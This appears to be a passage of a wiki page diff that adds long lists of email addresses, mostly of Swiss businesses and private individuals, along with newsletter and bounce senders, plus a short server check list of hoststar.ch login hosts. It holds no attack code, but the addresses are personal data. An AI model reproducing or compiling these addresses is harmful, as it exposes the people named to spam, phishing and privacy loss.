+ | ines.mooslechner@roche.com | ||
+ | info@aeschbacher-ag.ch | ||
+ | info@amstutz-molkerei.ch | ||
+ | info@autoteile-limmattal.ch | ||
+ | info@badboyproductions.ch | ||
+ | info@berosa.ch | ||
+ | info@bluetenstil.com | ||
+ | info@christen-gartenbau.ch | ||
+ | info@christian-frieden.ch | ||
+ | info@christian-raess.ch | ||
+ | info@dalchenhof.ch | ||
+ | info@delivros.ch | ||
+ | info@dergluecksbringer.ch | ||
+ | info@direkthilfe.ch | ||
+ | info@easyapps.ch | ||
+ | info@eco-trattamenti.ch | ||
+ | info@elternbildungstag-freiamt.ch | ||
+ | info@ess-bau.ch | ||
+ | info@expedition-earth.com | ||
+ | info@farbraeume.ch | ||
+ | info@ferrarelli.ch | ||
+ | info@finefinancial.ch | ||
+ | info@fischerdiensteag.ch | ||
+ | info@friplan.ch | ||
+ | info@haus-gartenservice.ch | ||
+ | info@hobire.ch | ||
+ | info@horbermatt.ch | ||
+ | info@houseofjeans.ch | ||
+ | info@hts-andrea.ch | ||
+ | info@irene-hofer.ch | ||
+ | info@iventas.ch | ||
+ | info@jrenestuder.ch | ||
+ | info@koch-cosmetics.ch | ||
+ | info@kontec.ch | ||
+ | info@kostgeld.ch | ||
+ | info@kuemmerli-schmuck.ch | ||
+ | info@kunstwerkaccessoires.ch | ||
+ | info@lacher.ch | ||
+ | info@lesida.ch | ||
+ | info@lu-trueb.ch | ||
+ | info@malerhandwerk.ch | ||
+ | info@meiermech.ch | ||
+ | info@mpironti.ch | ||
+ | info@ms-photo.ch | ||
+ | info@nbs-fischer.ch | ||
+ | info@oenzer-braeu.ch | ||
+ | info@pc-fischer.ch | ||
+ | info@pessi.ch | ||
+ | info@presto-pizza.ch | ||
+ | info@probett.ch | ||
+ | info@ready4fun.ch | ||
+ | info@restaurantlindenhof.ch | ||
+ | info@roal.ch | ||
+ | info@rogerbechtiger.ch | ||
+ | info@rothvermoegen.ch | ||
+ | info@ruetlihaus.ch | ||
+ | info@runa.ch | ||
+ | info@schmidiger-willisau.ch | ||
+ | info@silhouette.li | ||
+ | info@srvg.ch | ||
+ | info@swiss-consultrading.ch | ||
+ | info@tarallucce.ch | ||
+ | info@taverna-zug.ch | ||
+ | info@thespiritofgospel.com | ||
+ | info@ts-velos.ch | ||
+ | info@velocenter.ch | ||
+ | info@voodoorhythm.com | ||
+ | info@waldegg-keller.ch | ||
+ | info@was-ist-felix.ch | ||
+ | info@webelec.ch | ||
+ | info@wolfspirit.ch | ||
+ | info@zahntechnik-weinfelden.ch | ||
+ | irene.reichart@rogerbechtiger.ch | ||
+ | j.zwyssig@strisa.com | ||
+ | jennifer.streuli@gibim.ch | ||
+ | jenny@industry-recruitment.com | ||
+ | jessica.vestil@code-ent.ch | ||
+ | jknupfer@oykos.ch | ||
+ | jolanda.bleicher@piik.ch | ||
+ | joliberger@pop.agri.ch | ||
+ | josef@zwyssig.net | ||
+ | julie@efficio.paris | ||
+ | julie@onelouderagency.com | ||
+ | karina@jacopino.com | ||
+ | katarina@klijent.hr | ||
+ | kathi@aeschbacher-ag.ch | ||
+ | kerst@immo-vision.ch | ||
+ | kondratenko@semantica.ch | ||
+ | kontakt@fabiomueller.ch | ||
+ | kontakt@nail-art-garage.ch | ||
+ | kontakt@pretum.de | ||
+ | kontakt@reiplinger.com | ||
+ | krebser@babybalkon.ch | ||
+ | krim@4tunedj.ch | ||
+ | kurs@elternbildungstag-freiamt.ch | ||
+ | kurt@aeschbacher-ag.ch | ||
+ | lara@tantan.ch | ||
+ | lisa.duca@hotmail.com | ||
+ | locarno@famigliediurne.ch | ||
+ | luca.ravazza@gmail.com | ||
+ | lucas@sunsetshop.ch | ||
+ | lucrezia.capatt@rogerbechtiger.ch | ||
+ | lukas.duschmale@bluewin.ch | ||
+ | lutz@lutzbuss.ch | ||
+ | lutz@personal-lutz.ch | ||
+ | m.friker@gmx.ch | ||
+ | m.gerber@christen-gartenbau.ch | ||
+ | m.mueller@sonnenhofbeeren.ch | ||
+ | madeleine@swissvet.ch | ||
+ | mail@babelfilm.ch | ||
+ | mail@maknu.ch | ||
+ | mail@maler-scorpion.ch | ||
+ | mail@outlet24.ch | ||
+ | mail@personal-lutz.ch | ||
+ | mail@peterkaeser.ch | ||
+ | mail@spaeti.com | ||
+ | mail@tartaruga-design.ch | ||
+ | majarohner@fussreflexplus.ch | ||
+ | marc.odemer@mavi.com | ||
+ | marco.sigrist.mega@masime.ch | ||
+ | marianne.buetler@buetlertreuhand.ch | ||
+ | marketing@lu-trueb.ch | ||
+ | marleen.weber@3ple-e.ch | ||
+ | martin.eisenlohr@twenty4.ch | ||
+ | mathias@gaeumann.net | ||
+ | maucen@caligo.ch | ||
+ | maurizio@cencigh.net | ||
+ | me@hd-photo.ch | ||
+ | melanie.ramser@horbermatt.ch | ||
+ | meryem.beypinar@rogerbechtiger.ch | ||
+ | mhofmann@pfimiherisau.ch | ||
+ | michael.benz@lacher.ch | ||
+ | mike@streuli.mobi | ||
+ | monika@tigha.com | ||
+ | mueller-beeren@bluewin.ch | ||
+ | muntelier@outlet24.ch | ||
+ | nadia.heer@investsuisse.ch | ||
+ | nicole@plozner.ch | ||
+ | nina.fakner@leonteq.com | ||
+ | notification@synology.com | ||
+ | office@k-box.ch | ||
+ | olivia@cencigh.net | ||
+ | olten@beratungs-zentrum.ch | ||
+ | olten@naturepower-stuetzpunkt.ch | ||
+ | order@voodoorhythm.com | ||
+ | patrick.rueegg@schafferei.com | ||
+ | peter.buetler@buetlertreuhand.ch | ||
+ | peter_christ@bluewin.ch | ||
+ | pfeffinger@freund-holzbau.ch | ||
+ | pfister.teppich@top-care.ch | ||
+ | president@blueknights1.ch | ||
+ | pumi@themonsters.ch | ||
+ | puravidaschweiz@bluewin.ch | ||
+ | pwalder@webelec.ch | ||
+ | r.albizzati@roal.ch | ||
+ | ra@openeye.tv | ||
+ | ralph.triebold@altekanti.ch | ||
+ | raphael.ferrer@easyapps.ch | ||
+ | rebecca.looser@rogerbechtiger.ch | ||
+ | redaktion@ox-fanzine.de | ||
+ | ricardo@spaeti.com | ||
+ | richards-gold@richards-gold.ch | ||
+ | riggenbach@dalchenhof.ch | ||
+ | ringger@swissvet.ch | ||
+ | robin.reko@web.de | ||
+ | roger.bechtiger@rogerbechtiger.ch | ||
+ | roland@spaeti.com | ||
+ | rolf.gruber@richards-gold.ch | ||
+ | rolf@gruber-kommunikation.ch | ||
+ | rosalba@niid-it.ch | ||
+ | rosario@frasca.li | ||
+ | rose.sauerborn@dreso.com | ||
+ | rosi.nussbaumer@top-care.ch | ||
+ | ruedi@aeschbacher-ag.ch | ||
+ | ruth@zwyssig.net | ||
+ | s.matic@irma-ag.ch | ||
+ | sabina.lack@rogerbechtiger.ch | ||
+ | samira.ruggiero@nbs-fischer.ch | ||
+ | sammelkonto@gibim.ch | ||
+ | sandro@tantan.ch | ||
+ | saywhat@onelouderagency.com | ||
+ | sb@sportagon.ch | ||
+ | sblaser@ecofon.ch | ||
+ | schaedeli.harzruetihof@bluewin.ch | ||
+ | seegarten@lutzbuss.ch | ||
+ | shelly.vonsury@interprodis.com | ||
+ | shop@dynamica-kurse.ch | ||
+ | silvia.baertschi@lesida.ch | ||
+ | simone.lanz@dalchenhof.ch | ||
+ | sopraceneri@famigliediurne.ch | ||
+ | spam.schuepi@ontour.ch | ||
+ | spet@bluewin.ch | ||
+ | spr@gymneufeld.info | ||
+ | sstaeuble@marwell.ch | ||
+ | st.moritz@kusterpartner.ch | ||
+ | stellatina83@hotmail.com | ||
+ | stmoritz@lutzbuss.ch | ||
+ | stoeckli@dalchenhof.ch | ||
+ | strubpe@bluewin.ch | ||
+ | stschanz@gmx.ch | ||
+ | studentin@5leos.de | ||
+ | stutz@st-st.ch | ||
+ | suter-werbung@bluewin.ch | ||
+ | swan.lee@bluewin.ch | ||
+ | t.dumm@delivros.ch | ||
+ | t1@mailinghouse.ch | ||
+ | tanja.vonhopffgarten@netzagentin.ch | ||
+ | tanja@netzagentin.ch | ||
+ | tcarraro@culturart-carraro.ch | ||
+ | tcschweiz@top-care.ch | ||
+ | tczentralschweiz@top-care.ch | ||
+ | tea@voodoorhythm.com | ||
+ | theo@wolfspirit.ch | ||
+ | thomas@bertolf-farbdesign.ch | ||
+ | tidi@tenac.ch | ||
+ | tobias@hopfenshop.ch | ||
+ | tobias@monkeybrain-brewery.ch | ||
+ | tommi@thomastraum.com | ||
+ | u.bucher@nau-gmbh.ch | ||
+ | ulla@singler.ch | ||
+ | us@schroeer-sell.com | ||
+ | wa@wlkl.ch | ||
+ | webmaster@lhl.ch | ||
+ | zoll@ahg-mobile.de | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | 1.txt | ||
+ | |||
+ | <syntaxhighlight lang="bash" style="font-size:9pt;"> | ||
+ | |||
+ | 10523=f62bcb5f-0515-4980-9388-6bafcc340560=2=366048@e.maselectiondujour.com | ||
+ | 20150907132016b61ea611b6c047d2811a2b6b0f5fa3c8@bounces.amazon.de | ||
+ | 3SZTtVQgTBNwLM-PCNJW8AAMSLRQ.EMMEJC.AMKGLDMNA-DGQAFCP.AF@gaia.bounces.google.c | ||
+ | 3f7.c.0a662bc4-0600-4623-b8de-77f8f4577e5f.1448@bounce.emailproda.marketingstu | ||
+ | 3f7.c.2cefc4a4-d2f1-491a-ac53-6356aaff01c3.1448@bounce.emailproda.marketingstu | ||
+ | AVarela@memorialcare.org | ||
+ | Alexander.Rueegg@flynt.io | ||
+ | CSV-CHE@g-star.com | ||
+ | DKoch@chrissports.ch | ||
+ | Desiree.Gisi@pfister.ch | ||
+ | HVW@lundbeck.com | ||
+ | Hedi.Kappeler@zuerich.ch | ||
+ | Info@fuchs-movesa.ch | ||
+ | JBornand@kvz-schule.ch | ||
+ | Katharina.fries@wwfost.ch | ||
+ | Liechti@hr-gastro.ch | ||
+ | MXRPodoblock-hyhyikt1hiujirkyy1j@cmail19.com | ||
+ | Marc.Odemer@mavi.com | ||
+ | Matthias.Baertschi@varian.com | ||
+ | Melanie.Pauli@Madison.ch | ||
+ | Michael.Luethold@km-u.ch | ||
+ | OFFICE@UNGERTREINA.CH | ||
+ | QNAP@bombasei.ch | ||
+ | S.Galliker@settelen.ch | ||
+ | SME.Contactcenter@bill.swisscom.com | ||
+ | Sekretariat@ebuero.de | ||
+ | Therese.Luethi@canon.ch | ||
+ | Thomas.Riklin@sgkb.ch | ||
+ | VICENews-tljdykt1jiydtklkl1i@cmail2.com | ||
+ | YTEKUNL39_npai+julie=onelouderagency.com.100690285@simexo05.net | ||
+ | Zurich@zurich.ch | ||
+ | a.gerovski@irma-ag.ch | ||
+ | ad@a.qianzhuque.com | ||
+ | adi@centraldubs.com | ||
+ | admin@carpnet.ch | ||
+ | admin@svdi.ch | ||
+ | andrea.metzger@fraviundfravi.ch | ||
+ | andrea@capellas.ch | ||
+ | anjuscha.mies@iffp.ch | ||
+ | annemarie@naenny.ch | ||
+ | arca@famigliediurne.ch | ||
+ | architektur-news@mum.de | ||
+ | armin.xylander@real-stein.ch | ||
+ | armingrieb@swissonline.ch | ||
+ | asterisk@e-fon.ch | ||
+ | b0685bd6355sandro=tantan.ch@bounce.twitter.com | ||
+ | b0685f970d6info=christian-frieden.ch@bounce.twitter.com | ||
+ | b15czhzfzfvbgfrhzvv69t@auevs.reisen.de | ||
+ | b15czhzfzzbzrguzggr85t@cbm.deal-des-tages.holidaydeals24.com | ||
+ | b15czhzfzzhbgfrhzvv74t@auevs.ab-in-den-urlaub.de | ||
+ | bd@buerohochform.ch | ||
+ | beat-man@voodoorhythm.com | ||
+ | beat.hofstetter@hofiplan.ch | ||
+ | beat.jenni@mobi.ch | ||
+ | beebeesl@jackassificationw.newmsgforyou4.net | ||
+ | beni.rieder@outlet24.ch | ||
+ | bloodbathst@gil.com.au | ||
+ | bo-215Y-3MPXD-F0WFUC-BZWJT@harley-davidson-information.eu | ||
+ | bounce+063436.04ba2a-info=christen-gartenbau.ch@neuepersonal.ch | ||
+ | bounce+22833@bounce.crsend.com | ||
+ | bounce+24384@bounce.crsend.com | ||
+ | bounce+529f60.13ac0-info=christen-gartenbau.ch@stellendienst.ch | ||
+ | bounce+84111@bounce-eu1.crsend.com | ||
+ | bounce+eI5-S89K-oT9z@mix.newsdeouf.com | ||
+ | bounce-25@bounce.mailmktg.video2brain.com | ||
+ | bounce-68_HTML-25396052-10394-7210964-186@bounce.e1.victoriassecret.com | ||
+ | bounce-9020-4540064-8000-248@tradewm.com | ||
+ | bounce-hdh3vfe5bp5vd7hetfarpxcgi47jl6yxgrp4dzommf3zwyszoiza@mailing.wortmann.d | ||
+ | bounce-mc.us10_38641925.364237-info=wolfspirit.ch@mail22.suw11.mcdlv.net | ||
+ | bounce-mc.us10_39733849.345461-Esther=vanhest.ch@mail43.atl51.rsgsv.net | ||
+ | bounce-mc.us10_39930145.83253-beat-man=voodoorhythm.com@mail38.suw11.mcdlv.net | ||
+ | bounce-mc.us10_39930145.83253-info=voodoorhythm.com@mail38.suw11.mcdlv.net | ||
+ | bounce-mc.us1_773397.2730773-gs=schroeer-sell.com@mail186.atl171.mcdlv.net | ||
+ | bounce-mc.us2_3097518.1577273-info=waldegg-keller.ch@mail250.suw14.mcdlv.net | ||
+ | bounce-mc.us3_22821967.1099797-info=tarallucce.ch@mail81.us4.mcsv.net | ||
+ | bounce-mc.us3_27422551.1098965-rolf.gruber=richards-gold.ch@mail5.wdc01.mcdlv. | ||
+ | bounce-mc.us4_9452145.376857-me=hd-photo.ch@mail178.atl101.mcdlv.net | ||
+ | bounce-mc.us7_18736435.1093497-info=lacher.ch@mail189.atl61.mcsv.net | ||
+ | bounce-mc.us7_21114335.489133-julie=onelouderagency.com@mail76.atl161.mcsv.net | ||
+ | bounce-mc.us8_32336586.1232021-beat-man=voodoorhythm.com@mail204.atl61.mcsv.ne | ||
+ | bounce-mc.us8_32336586.1232021-info=voodoorhythm.com@mail204.atl61.mcsv.net | ||
+ | bounce-mc.us9_32860194.1227433-info=presto-pizza.ch@mail180.wdc02.mcdlv.net | ||
+ | bounce-mc.us9_33518029.750917-tanja=netzagentin.ch@mail21.suw13.rsgsv.net | ||
+ | bounce-mc.us9_33902773.575745-tidi=tenac.ch@mail32.suw11.mcdlv.net | ||
+ | bounce2+caAA4KNEQAAAFY4AABYDEAAAAAAAAAYH4VEVHQ@news.vogel.de | ||
+ | bounce@bounce-eu1.crsend.com | ||
+ | bounce@e10.tind-book.com | ||
+ | bounce@e11.wc9-med1.fr | ||
+ | bounce@newsletter.ottos.ch | ||
+ | bounces+304918-7835-rolf=gruber-kommunikation.ch@notifier.mynewsdesk.com | ||
+ | bounces+83566-99e3-buss=lutzbuss.ch@email.membersuite.com | ||
+ | bounces+922094-173b-meryem.beypinar=rogerbechtiger.ch@email.wetransfer.com | ||
+ | bounces-498210914936346415@explore.pinterest.com | ||
+ | bounces-506795901726002572@explore.pinterest.com | ||
+ | brigitte.hosmann@stafag.ch | ||
+ | brigitte.koeppel@activestudiofame.ch | ||
+ | britta.schadegg@bluewin.ch | ||
+ | btv1==6923108521b==nina.fakner@leonteq.com | ||
+ | c.abderhalden@houseofjeans.ch | ||
+ | catalogues@geniplan.ch | ||
+ | christoph.s@gmx.ch | ||
+ | claudia.graubner@vetsuisse.unibe.ch | ||
+ | coach@blb-selects.ch | ||
+ | corinne.deodorico@steiner-ag.ch | ||
+ | cutealona@gmail.com | ||
+ | d.weiss@horsedoc.ch | ||
+ | dani.balzer@gmx.net | ||
+ | daniel@swiss-consultrading.ch | ||
+ | danilo.jacoma@roto-frank.com | ||
+ | delivery@mx.sailthru.com | ||
+ | digitec@digitecgalaxus.ch | ||
+ | dkoller@pfister-mauren.ch | ||
+ | doug@finderskeepersrecords.com | ||
+ | dreamnation@orange.fr | ||
+ | e3-1554509515624-635c9II928290II3@e3.emarsys.net | ||
+ | email@newsdesmarq.ccemails.com | ||
+ | emfule5@emfule5.onmicrosoft.com | ||
+ | eric.nussbaumer@top-care.ch | ||
+ | ero@auy.com | ||
+ | euromillion@euromillion.com | ||
+ | fabio.flueckiger@students.gymneufeld.ch | ||
+ | francesco@gullo.ch | ||
+ | franco.devita@devita-design.ch | ||
+ | frau@sia.ch | ||
+ | fuli@litaochinese.com | ||
+ | g-22013760179-22020-2200034211-1441630707951@bounce.n.dawanda.com | ||
+ | g-22014216028-22020-2200034215-1441630530313@bounce.n.dawanda.com | ||
+ | gabriella_th@hotmail.com | ||
+ | gillesnow@gmail.com | ||
+ | gisela.hilfiker@bluewin.ch | ||
+ | gnaws1@unb.ca | ||
+ | gs@schroeer-sell.com | ||
+ | hannaholmlakes1@qq.com | ||
+ | hccby@cbtc.ch | ||
+ | hrrb@bluewin.ch | ||
+ | html@newsletter.avm.de | ||
+ | hufschmiede@dalchenhof.ch | ||
+ | i.dolci@orange.fr | ||
+ | ines.mooslechner@roche.com | ||
+ | info@SCHUBIGER-online.ch | ||
+ | info@amstutz-molkerei.ch | ||
+ | info@bewusstessen.ch | ||
+ | info@bluecityhotel.ch | ||
+ | info@cinedome-gastro.ch | ||
+ | info@easyapps.ch | ||
+ | info@ernaehrungswirtschaft.ch | ||
+ | info@finefinancial.ch | ||
+ | info@friplan.ch | ||
+ | info@geissler-rae.com | ||
+ | info@goeggel.com | ||
+ | info@grafik-zone.ch | ||
+ | info@haus-gartenservice.ch | ||
+ | info@isoled.ch | ||
+ | info@logma.ch | ||
+ | info@mabeco-ag.ch | ||
+ | info@neubauer.ch | ||
+ | info@newsletter.leshop.ch | ||
+ | info@newsletter.suissemania.ch | ||
+ | info@restaurantlindenhof.ch | ||
+ | info@roal.ch | ||
+ | info@rogerbechtiger.ch | ||
+ | info@rossinibar.ch | ||
+ | info@rusys.ch | ||
+ | info@sattler-fleisch.ch | ||
+ | info@swiss-consultrading.ch | ||
+ | info@tintronys.co.ua | ||
+ | info@vr-architekten.ch | ||
+ | info@wangenpark.ch | ||
+ | info@wepa.ch | ||
+ | info@zircologik.ch | ||
+ | isabelvanheemstra@gmx.ch | ||
+ | j.mueller@keilzinkwerk.ch | ||
+ | jis_1028_geecie_dbfdj@votre-kiosque.com | ||
+ | jis_1028_geecie_ghadg@votre-kiosque.com | ||
+ | jis_1551_geeiae_bahab@cavanews.fr | ||
+ | jjochpcwexn@bralcoelectrique.com | ||
+ | jknupfer@oykos.ch | ||
+ | jobs@ethz.ch | ||
+ | jose@salsaconvention.ch | ||
+ | jradmin@jobrapidoalert.com | ||
+ | jtaravel@ligne-roset.ch | ||
+ | julia.bregenzer@hotmail.com | ||
+ | julie@efficio.paris | ||
+ | kofmehl-info-bounces@lists.solnet.ch | ||
+ | kontakt@pretum.de | ||
+ | kundendienst@buchzentrum.ch | ||
+ | kundendienst@ricardo.ch | ||
+ | kurs@elternbildungstag-freiamt.ch | ||
+ | kurt@aeschbacher-ag.ch | ||
+ | laila.gloor@mailinghouse.ch | ||
+ | leo442rue@orange.fr | ||
+ | leuka1@bluewin.ch | ||
+ | listbounces@limoranews.com | ||
+ | liumengluan@cnni.net.cn | ||
+ | locateanything-beat+2Dman=voodoorhythm.com@gridrecord.xyz | ||
+ | lockheedk@anorthographicalv.newmsgforyou73.net | ||
+ | lutz@lutzbuss.ch | ||
+ | m-1f9u4aamcmfunee9r6szsgoua5590yiohe8u9jaaubveob7zklhb0qvs6xso7@bounce.linkedi | ||
+ | m-1h9ydzgutcxa0764nmb18lm4jkbh4j0dhye3hqftayk87hcm14jvwl4ekh1fc@bounce.linkedi | ||
+ | m-2i29ogl9vbzypnll3j6s3fvsp997bbw62x3gbzt3uxvdcfnto1wdy@bounce.linkedin.com | ||
+ | m-5mlc8q55fhl4m3tpazwicsnyop0auei9vt6f9f6avxp4tatw2rd3kshj@bounce.linkedin.com | ||
+ | m-aq1rs0lnuz3kuhurvfuwehipxrrvd0tuuh8zjqpq7fkft@bounce.linkedin.com | ||
+ | m-r8blapjzjk99xqvxty6xi9ssp02e6opwfw19iielm8we67f4rq25b8@bounce.linkedin.com | ||
+ | m.meester@adria-properties.com | ||
+ | m.mueller@sonnenhofbeeren.ch | ||
+ | mafo@sbb.ch | ||
+ | mail@bounces.weekend-deals.ch | ||
+ | mail@webgridd163.emsecure.net | ||
+ | mailgun@mailer201.agnitas.de | ||
+ | mailgun@mailer202.agnitas.de | ||
+ | mailgun@mailer203.agnitas.de | ||
+ | mailgun@mailer204.agnitas.de | ||
+ | mailgun@mailer206.agnitas.de | ||
+ | mailgun@mailer211.agnitas.de | ||
+ | mailgun@mailer212.agnitas.de | ||
+ | mailgun@mailer213.agnitas.de | ||
+ | mailgun@mailer214.agnitas.de | ||
+ | mailing@ca-akademie.de | ||
+ | mailman@m150.gem.godaddy.com | ||
+ | mailreturn@smtp16.ymlpsrvr.com | ||
+ | mamala49@bluewin.ch | ||
+ | marcom.ch@mitel.com | ||
+ | maria_aznar@libero.it | ||
+ | marianne.buetler@buetlertreuhand.ch | ||
+ | marliesbuchs@roal.ch | ||
+ | michael.zeller@resta.ch | ||
+ | michelalanteri@libero.it | ||
+ | modateam@bluewin.ch | ||
+ | monika.mueller@hirslanden.ch | ||
+ | mueller-beeren@bluewin.ch | ||
+ | mueller@mein-schwein.ch | ||
+ | mut@mensch-und-technik.ch | ||
+ | nadja@ggs.ch | ||
+ | natwstbuklondon@natwst.net | ||
+ | news@common.sociabilimail.com | ||
+ | news@nextex.ch | ||
+ | news@offres-defisc.com | ||
+ | newsletter@timmermahn.ch | ||
+ | newsletter_Motochic@hostettler.com | ||
+ | nl@erfc.com | ||
+ | noreply.bedruckteregister@drivingsender.org | ||
+ | noreply.bedruckteregister@trustedhosting.biz | ||
+ | noreply@amsler.ch | ||
+ | noreply@delivros.ch | ||
+ | noreply@displaypanel.org | ||
+ | noreply@exsila.ch | ||
+ | noreply@lu-trueb.ch | ||
+ | noreply@mobility.ch | ||
+ | noreply@zumba.com | ||
+ | notification+kjdm-viwj77i@facebookmail.com | ||
+ | notification+kr4kay5ymxqa@facebookmail.com | ||
+ | notification+yqssaesx@facebookmail.com | ||
+ | notification+zj4ytfo0ssa6@facebookmail.com | ||
+ | notification@synology.com | ||
+ | office@a-b-engineering.ch | ||
+ | office@die-neue-zeit.ch | ||
+ | office@flughafenregion.ch | ||
+ | office@k-box.ch | ||
+ | office@merznet.ch | ||
+ | olten@naturepower-stuetzpunkt.ch | ||
+ | oolitesa@nondepletiona.newmsgforyou62.net | ||
+ | order.Autoreifenonline.ch@delti.com | ||
+ | order@voodoorhythm.com | ||
+ | patricio.mendoza@cnel.gob.ec | ||
+ | patrick.struebi@fairtrasa.com | ||
+ | pecansk@acm.org | ||
+ | perezmartin95@yahoo.es | ||
+ | peter.buetler@buetlertreuhand.ch | ||
+ | peter_christ@bluewin.ch | ||
+ | pfeffinger@freund-holzbau.ch | ||
+ | post@redtree.no | ||
+ | postopticz@aspiringy.newmsgforyou72.net | ||
+ | ppn@branchprop.com | ||
+ | print09@paquet-kite.eicp.net | ||
+ | probioslim@canperfcts.net | ||
+ | prvs=06905f2df3=Gerhard.Kapphahn@lu.ch | ||
+ | prvs=069217b49e=noreply@post.ch | ||
+ | prvs=069287C15F=b.jourdan@framework.ch | ||
+ | prvs=0692da99d0=f.resico@robert-spleiss.ch | ||
+ | prvs=169203aa92=A.Reich@reich-transport.li | ||
+ | prvs=16920e803c=claudia.lambelet@bio-suisse.ch | ||
+ | prvs=685398e8c=Fritz.Pulfer@coop.ch | ||
+ | prvs=685b43087=Cecilia.Cencigh@dhl.com | ||
+ | pumi@themonsters.ch | ||
+ | ran@abearchitekten.ch | ||
+ | raphael.ferrer@easyapps.ch | ||
+ | ras@marty-architektur.ch | ||
+ | re_fa@bluemail.ch | ||
+ | rechlin@praxisambrausebad.ch | ||
+ | rechnungsversand@knv.de | ||
+ | redaktion@ox-fanzine.de | ||
+ | respons@callnow.no | ||
+ | return@newsletter.ticketcorner.ch | ||
+ | reverbnation@reverbnation.com | ||
+ | rose.sauerborn@dreso.com | ||
+ | rudolf@trottmann.com | ||
+ | s-2dcowrv73tv84jl3dwkgqip4m3ky3yixpf3k0eyso2svrttbdrl6fhh3@bounce.linkedin.com | ||
+ | s-2f57u9rgxpkja3nzwe1m87055l40pvdc83m6xx8e3wxjf8zkh9wbi7n8@bounce.linkedin.com | ||
+ | s-2kedou8yg5u57j9jvnig0sluu63c39geq5072wyzse96tvvc8jm20xth@bounce.linkedin.com | ||
+ | s-2m7weeyepbo28mhwhcaji3qzqmmwdz24t44ulsl3gwihqj7frg8509r9@bounce.linkedin.com | ||
+ | s-2rik34s1x94lo8io34wod1co1ewp1dt9dros10guwurz5xkut5emw38j@bounce.linkedin.com | ||
+ | s-2rilrnq7ybbfi4kzgx2z2irr45u4aqnok5sy8ip47vlyc8nzi236kx88@bounce.linkedin.com | ||
+ | s-2t9l8rfli1t637hxixqmod56km18tx34g1femr3y5rnci5oibh0277zr@bounce.linkedin.com | ||
+ | s-2tajb2a17mygk44grh13qu7qonkjme47tfr02n8ktk8zru7g9vsgqypg@bounce.linkedin.com | ||
+ | s-4s3v9dqxgvzaq9otxhds2mkew0vwrcxlmmvnbxujcxnn1rof2y1nospv@bounce.linkedin.com | ||
+ | s-4semecgerqjoqtb7m7z3pwbox5h3y15i43lylr6lbj2mgus91ucfw8q8@bounce.linkedin.com | ||
+ | s-4vnvqltwak1t8eujgtjaqxbyifjkgvv6m3j3vic1lsq5wzmgw3kjbltl@bounce.linkedin.com | ||
+ | s-4xdts5ufb20rwd29bb3bobr9237maxyrqreehx7it1ty0z1qf0mjq44l@bounce.linkedin.com | ||
+ | s-4z5k6hrobypcmudqth1pg0g4v4xbx9plhxom7lkw74vrwejm19wbqwkl@bounce.linkedin.com | ||
+ | s-4zhjznzvteirwa6lmzvzrzhk9xefd0zid58k69fgfg1cncpxsqyfhe0h@bounce.linkedin.com | ||
+ | s-50wsp0sa059gqiwhiyvo9498uf7nme4hfper9xkcvhy12ippiwhlapf4@bounce.linkedin.com | ||
+ | s.ruibal@pedrazzini-advokatur.ch | ||
+ | s.wunderli@oeschgarten.ch | ||
+ | sabina.lack@rogerbechtiger.ch | ||
+ | sales@conrad.ch | ||
+ | sarah@helpgroup.ch | ||
+ | sb@sportagon.ch | ||
+ | seegarten@lutzbuss.ch | ||
+ | service-clients@newsletter.afai42.com | ||
+ | service-clients@newsletter.guil21.com | ||
+ | service@merchstore.net | ||
+ | smilelessl@chortosterolv.newmsgforyou64.net | ||
+ | snapshotteda@jarringlya.newmsgforyou70.net | ||
+ | sommerende@mynailandcosmeticstudio.de | ||
+ | sonja.schuermann@siemens.com | ||
+ | sopraceneri@famigliediurne.ch | ||
+ | spr@gymneufeld.info | ||
+ | stefanie.kromer@hotmail.com | ||
+ | stellatina83@hotmail.com | ||
+ | stmoritz@lutzbuss.ch | ||
+ | stoeri@auto-ehrbar.ch | ||
+ | studentforgiveness@sculfl.eu | ||
+ | support@nitrado.net | ||
+ | suter-werbung@bluewin.ch | ||
+ | suter.ebne@bluewin.ch | ||
+ | swan.lee@bluewin.ch | ||
+ | symantec@htlab.ch | ||
+ | t.dumm@delivros.ch | ||
+ | taezvpu@bpums.com | ||
+ | tcschweiz@top-care.ch | ||
+ | tczentralschweiz@top-care.ch | ||
+ | tegan.proctor@qwest.com | ||
+ | test@ateps.ru | ||
+ | tgkh@fksw.com | ||
+ | tommi@thomastraum.com | ||
+ | twenty4.ch.11437402.martin.eisenlohr@mortifying.slimhandel.eu | ||
+ | u.bucher@nau-gmbh.ch | ||
+ | ubbhctbe@vl.com | ||
+ | ufca@bradleysdavis.com | ||
+ | unmortgageablez@millifaradh.newmsgforyou343.net | ||
+ | update+kr4m4grrbryn@facebookmail.com | ||
+ | upload@dreso.com | ||
+ | us@schroeer-sell.com | ||
+ | utefeldmann@gmx.de | ||
+ | v-lmcoec_dledediin_ceplmebm_ceplmebm_a@bounce.novastor.mkt4605.com | ||
+ | voice-service@voicemail.chello.ch | ||
+ | vvaobhldbycj@bostonbrace.com | ||
+ | wcoe@bouterse.com | ||
+ | webmaster@stellen-pema.ch | ||
+ | yfwejcefmdw@brainius.com | ||
+ | yvonne.iten@livit.ch | ||
+ | zJycbJycjLRsDIxs7GzMnLRGtEycDKwcDEys@smtp-soi-g13-138.aweber.com | ||
+ | zJycbJycjLRsDIysrByMLLRGtEycDKwcDEys@smtp-soi-g13-137.aweber.com | ||
+ | zkvch@srv1.tophost.ch | ||
+ | zoll@ahg-mobile.de | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | <syntaxhighlight lang="bash" style="font-size:9pt;"> | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ---- | ||
+ | |||
Server check | Server check | ||
Zeile 2.800: | Zeile 9.515: | ||
login-32.hoststar.ch * | login-32.hoststar.ch * | ||
− | login-33.hoststar.ch | + | login-33.hoststar.ch * |
− | login-34.hoststar.ch | + | login-34.hoststar.ch * |
− | login-35.hoststar.ch | + | login-35.hoststar.ch * |
− | login-36.hoststar.ch | + | login-36.hoststar.ch * |
− | login-37.hoststar.ch | + | login-37.hoststar.ch * |
− | login-38.hoststar.ch | + | login-38.hoststar.ch * |
− | login-4.hoststar.ch | + | login-4.hoststar.ch * |
− | login-54.hoststar.ch | + | login-54.hoststar.ch * |
− | login-6.hoststar.ch | + | login-6.hoststar.ch * |
− | login-62.hoststar.ch | + | login-62.hoststar.ch * |
− | login-66.hoststar.ch | + | login-66.hoststar.ch * |
− | login-7.hoststar.ch | + | login-7.hoststar.ch * |
− | login-75.hoststar.ch | + | login-75.hoststar.ch * |
− | login-76.hoststar.ch | + | login-76.hoststar.ch * |
− | login-77.hoststar.ch | + | login-77.hoststar.ch * |
